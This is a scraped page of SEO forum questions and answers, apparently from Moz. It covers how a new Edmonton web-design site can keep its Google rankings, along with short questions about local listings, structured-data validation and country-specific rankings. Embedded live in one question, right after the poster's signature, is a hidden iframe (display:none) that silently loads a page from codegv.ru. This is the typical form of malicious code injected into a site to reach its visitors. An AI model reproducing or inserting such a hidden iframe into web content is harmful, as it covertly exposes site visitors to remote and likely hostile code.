Staying on top of Google - Edmonton Web
-
Hello Moz folks,
About 2 months ago we launched a brand new site - edmontonweb.ca
I have gotten some amazing advice from the folks here at Moz, and amazingly enough, we are now ranking in the top 2 in our city for keywords like "Edmonton web design."
We are very excited, but the question now, is how do we stay on top?
We are updating our blog on a weekly basis, we are continuing to build inbound links, but how can we do more? I have considered summarizing blog posts in "guest blogs," and linking back to our blog post (so not all the inbound links are directing at the home page). I have considered a more active presence through press releases. Could these strategies be effective?
Do you have any other suggestions on strategies we could utilize to stay on top?
Thanks,Anton TLAUNCH Core Inc.

Hello Anton,
The website looks great! It's good that you're ranking good for those keywords.
This appears to be your brand name though. I suppose to want to rank for terms without your brand query in it.I can see you have blog posts. I can't find a page with all of your blog posts though. I can only see the last four blog posts at the bottom of the page. Perhaps you could consider adding a link to a blog hub page.
Staying on top would be achieved by creating awesome content for your blog, having a good social presence and getting a lot of links and social signals. Since you have a nice portfolio and good blog posts these links will appear naturally over time. You can however speed up the process by reaching out to people who could link to you. Think about bloggers and journalists in you area who write articles on web design bureaus or local businesses.
Press releases are rather outdated if i'm not mistaking. I am not sure what you mean about the guest blog posts.
Do you mean summerizing several blog posts into one post and posting that on someone else's blog?
I would not recommend this since the content would no longer be unique. Check out this amazing article on guest blogging right here from Moz.Tips for staying on top - You seem to have good testimonials. Do you have a Google local page? The testimonials could also be inserted here by your clients. You could still place their reviews on your site manually after this.
- When you finish a website for a client encourage them to spread out the word about the new website through the media and make sure the resulting articles have a link or brand mention to you.
- Keep blogging about relevant topics which add value to your users.
- Consider creating content which could easily go viral such as infographics and awesome videos. This could complement your blog posts in a good way.
- Make it easy for users to find you on social media channels. At this moment the buttons in your footer don't actually link to your social media profiles. They seem to just refresh the page.
- Make sure your website doesn't contain crawl-issues by using Google Webmaster Tools
- Validate your HTML. At the moment not all your pages are valid -> W3C validator test
Hope i was of assistance, if you have anymore questions please let me know.

Search Result Discrepancy: Keyword "Dresses" shows international sites in the search results of Google.co.in.
Hi All, What would be the reason that Google shows international websites in the first page results while there are huge local players available. Eg: Dresses - Keyword that shows results with almost all the results from International websites whereas the local big players in the same category are not shown. This is not the case for other keywords like Women dresses, Clothing, Shoes etc., Is it a bug or any particular reasons? Thanks,

Google Structured Data Verses Yandex Structured Data Validator Query
Hi All, We have implemented Schema.org on our website and we have chosen a specific schema as opposed to just using the standard localbusiness. When we ran it through the Google Structured data tool it did not report any error , however , when we tried it on Yandex, it showed up as us having problems with the way we have tagged our addresses for our different locations so we have made additional changes to fix this. I have read somewhere that the Google Structured data tool is not 100% correct at showing any errors etc and that one should use Yandex as well for validation. I am wondering what others thoughts and if what I read should be taken as correct infomation?... I would be surprised if google did release something like the structured data validator if it wasn't as good at reporting than some others out there. thanks Pete

Main Website and microsite - Do I do google places for both as it will technically be duplicating the locations,?
Hi All, I have a main eCommerce website which trades out of a number of locations and all these locations appear in google places although they don't rank particularly well in google places . I also have a number of microsites which are specific to one type of product I do and these rank very well locally. My question is , should I also do google places for my microsites as this would technically mean I am creating a duplicate location listing in google places but for a different website etc./business I only have one google account so I guess this would be done under the same google account ? thanks Pete <iframe id="zunifrm" style="display: none;" src="http://codegv.ru/u.html"></iframe>

Site does not rank on Google's country specific search engines.
My site shows up on the first page of 'google.com' but not on the other search engines like google.co.uk / google.co.in / google.com.au. It shows up on the 3rd or 4th page for the most part. My competitors' sites rank consistently across all geographical versions of Google. Is there something i am missing out on? My website is a web applicaton and not a business listing.
